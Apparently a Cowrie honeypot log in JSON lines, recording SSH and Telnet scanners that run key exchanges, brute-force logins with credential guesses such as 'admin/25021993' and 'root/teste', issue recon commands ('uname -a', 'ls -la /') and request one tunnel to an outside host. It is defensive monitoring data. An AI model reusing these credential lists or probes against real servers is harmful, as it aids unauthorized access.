{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T23:01:00.435612Z","src_ip":"212.227.125.160","session":"a3c123e122ec"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solana","message":"login attempt [solv/solana] failed","sensor":"my-vps","timestamp":"2025-08-28T23:01:00.589106Z","src_ip":"212.227.125.160","session":"a3c123e122ec"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:01:01.642301Z","src_ip":"212.227.125.160","session":"a3c123e122ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39002,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cad8929473c","protocol":"ssh","message":"New connection: 212.227.235.229:39002 (1.2.3.4:22) [session: 6cad8929473c]","sensor":"my-vps","timestamp":"2025-08-28T23:01:40.600832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:01:40.725709Z","src_ip":"212.227.235.229","session":"6cad8929473c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T23:01:40.726462Z","src_ip":"212.227.235.229","session":"6cad8929473c"}
{"eventid":"cowrie.login.failed","username":"pfsense","password":"pfsense","message":"login attempt [pfsense/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T23:01:41.217579Z","src_ip":"212.227.235.229","session":"6cad8929473c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:01:42.373685Z","src_ip":"212.227.235.229","session":"6cad8929473c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53150,"dst_ip":"1.2.3.4","dst_port":22,"session":"857a2321ebac","protocol":"ssh","message":"New connection: 217.72.205.35:53150 (1.2.3.4:22) [session: 857a2321ebac]","sensor":"my-vps","timestamp":"2025-08-28T23:03:19.198440Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:03:19.199763Z","src_ip":"217.72.205.35","session":"857a2321ebac"}
{"eventid":"cowrie.session.connect","src_ip":"120.46.163.82","src_port":23278,"dst_ip":"1.2.3.4","dst_port":22,"session":"7454cf9f1a75","protocol":"ssh","message":"New connection: 120.46.163.82:23278 (1.2.3.4:22) [session: 7454cf9f1a75]","sensor":"my-vps","timestamp":"2025-08-28T23:05:16.883844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:05:16.884738Z","src_ip":"120.46.163.82","session":"7454cf9f1a75"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:05:17.091151Z","src_ip":"120.46.163.82","session":"7454cf9f1a75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35304,"dst_ip":"1.2.3.4","dst_port":22,"session":"08c8b9456a18","protocol":"ssh","message":"New connection: 212.227.235.229:35304 (1.2.3.4:22) [session: 08c8b9456a18]","sensor":"my-vps","timestamp":"2025-08-28T23:05:23.599790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:05:23.600859Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:05:23.708529Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25021993","message":"login attempt [admin/25021993] failed","sensor":"my-vps","timestamp":"2025-08-28T23:05:24.222164Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25021982","message":"login attempt [admin/25021982] failed","sensor":"my-vps","timestamp":"2025-08-28T23:05:25.332885Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25011992","message":"login attempt [admin/25011992] failed","sensor":"my-vps","timestamp":"2025-08-28T23:05:26.443564Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.login.failed","username":"admin","password":"24121983","message":"login attempt [admin/24121983] failed","sensor":"my-vps","timestamp":"2025-08-28T23:05:27.555669Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.login.failed","username":"admin","password":"24111980","message":"login attempt [admin/24111980] failed","sensor":"my-vps","timestamp":"2025-08-28T23:05:28.666152Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:05:29.777111Z","src_ip":"212.227.235.229","session":"08c8b9456a18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57918,"dst_ip":"1.2.3.4","dst_port":22,"session":"268a84940160","protocol":"ssh","message":"New connection: 212.227.125.160:57918 (1.2.3.4:22) [session: 268a84940160]","sensor":"my-vps","timestamp":"2025-08-28T23:05:50.833580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:05:52.275479Z","src_ip":"212.227.125.160","session":"268a84940160"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:05:52.276198Z","src_ip":"212.227.125.160","session":"268a84940160"}
{"eventid":"cowrie.login.success","username":"root","password":"teste","message":"login attempt [root/teste] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:05:59.398267Z","src_ip":"212.227.125.160","session":"268a84940160"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:06:02.561826Z","src_ip":"212.227.125.160","session":"268a84940160"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T23:06:02.562542Z","src_ip":"212.227.125.160","session":"268a84940160"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:04.057034Z","src_ip":"212.227.125.160","session":"268a84940160"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:04.058286Z","src_ip":"212.227.125.160","session":"268a84940160"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":43504,"dst_ip":"1.2.3.4","dst_port":22,"session":"0de8c6a891f8","protocol":"ssh","message":"New connection: 201.148.180.50:43504 (1.2.3.4:22) [session: 0de8c6a891f8]","sensor":"my-vps","timestamp":"2025-08-28T23:06:10.245944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:06:11.770595Z","src_ip":"201.148.180.50","session":"0de8c6a891f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:06:11.771582Z","src_ip":"201.148.180.50","session":"0de8c6a891f8"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":4542,"dst_ip":"1.2.3.4","dst_port":22,"session":"d595887ab219","protocol":"ssh","message":"New connection: 80.94.95.15:4542 (1.2.3.4:22) [session: d595887ab219]","sensor":"my-vps","timestamp":"2025-08-28T23:06:13.960624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T23:06:14.684222Z","src_ip":"80.94.95.15","session":"d595887ab219"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T23:06:14.770858Z","src_ip":"80.94.95.15","session":"d595887ab219"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T23:06:15.071638Z","src_ip":"80.94.95.15","session":"d595887ab219"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:16.126299Z","src_ip":"80.94.95.15","session":"d595887ab219"}
{"eventid":"cowrie.login.success","username":"root","password":"teste","message":"login attempt [root/teste] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:06:18.147578Z","src_ip":"201.148.180.50","session":"0de8c6a891f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:06:21.734787Z","src_ip":"201.148.180.50","session":"0de8c6a891f8"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T23:06:21.735543Z","src_ip":"201.148.180.50","session":"0de8c6a891f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60216,"dst_ip":"1.2.3.4","dst_port":23,"session":"a7af0b538839","protocol":"telnet","message":"New connection: 212.227.125.160:60216 (1.2.3.4:23) [session: a7af0b538839]","sensor":"my-vps","timestamp":"2025-08-28T23:06:22.683804Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.9","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:23.640033Z","src_ip":"201.148.180.50","session":"0de8c6a891f8"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:23.641136Z","src_ip":"201.148.180.50","session":"0de8c6a891f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21093,"dst_ip":"1.2.3.4","dst_port":22,"session":"cba5bff761c3","protocol":"ssh","message":"New connection: 212.227.125.160:21093 (1.2.3.4:22) [session: cba5bff761c3]","sensor":"my-vps","timestamp":"2025-08-28T23:06:34.515387Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:34.516498Z","src_ip":"212.227.125.160","session":"cba5bff761c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21442,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8fcd1b99911","protocol":"ssh","message":"New connection: 212.227.125.160:21442 (1.2.3.4:22) [session: b8fcd1b99911]","sensor":"my-vps","timestamp":"2025-08-28T23:06:34.632779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:06:34.633674Z","src_ip":"212.227.125.160","session":"b8fcd1b99911"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T23:06:34.750387Z","src_ip":"212.227.125.160","session":"b8fcd1b99911"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:06:35.102410Z","src_ip":"212.227.125.160","session":"b8fcd1b99911"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T23:06:35.220146Z","session":"b8fcd1b99911"}
{"eventid":"cowrie.session.closed","duration":12.600777387619019,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:35.284522Z","src_ip":"212.227.125.160","session":"a7af0b538839"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59624,"dst_ip":"1.2.3.4","dst_port":22,"session":"f710293260bb","protocol":"ssh","message":"New connection: 212.227.125.160:59624 (1.2.3.4:22) [session: f710293260bb]","sensor":"my-vps","timestamp":"2025-08-28T23:06:48.931995Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-28T23:06:48.933870Z","src_ip":"212.227.125.160","session":"f710293260bb"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:48.934968Z","src_ip":"212.227.125.160","session":"f710293260bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59644,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e5c691426cd","protocol":"ssh","message":"New connection: 212.227.125.160:59644 (1.2.3.4:22) [session: 9e5c691426cd]","sensor":"my-vps","timestamp":"2025-08-28T23:06:52.523715Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T23:06:52.524513Z","src_ip":"212.227.125.160","session":"9e5c691426cd"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:06:52.525329Z","src_ip":"212.227.125.160","session":"9e5c691426cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38710,"dst_ip":"1.2.3.4","dst_port":22,"session":"affe6954a396","protocol":"ssh","message":"New connection: 212.227.125.160:38710 (1.2.3.4:22) [session: affe6954a396]","sensor":"my-vps","timestamp":"2025-08-28T23:07:42.479450Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T23:07:42.480357Z","src_ip":"212.227.125.160","session":"affe6954a396"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:07:42.481166Z","src_ip":"212.227.125.160","session":"affe6954a396"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:07:44.632806Z","src_ip":"212.227.125.160","session":"b8fcd1b99911"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47838,"dst_ip":"1.2.3.4","dst_port":22,"session":"419c4c442958","protocol":"ssh","message":"New connection: 212.227.235.229:47838 (1.2.3.4:22) [session: 419c4c442958]","sensor":"my-vps","timestamp":"2025-08-28T23:07:56.115125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:07:56.116088Z","src_ip":"212.227.235.229","session":"419c4c442958"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2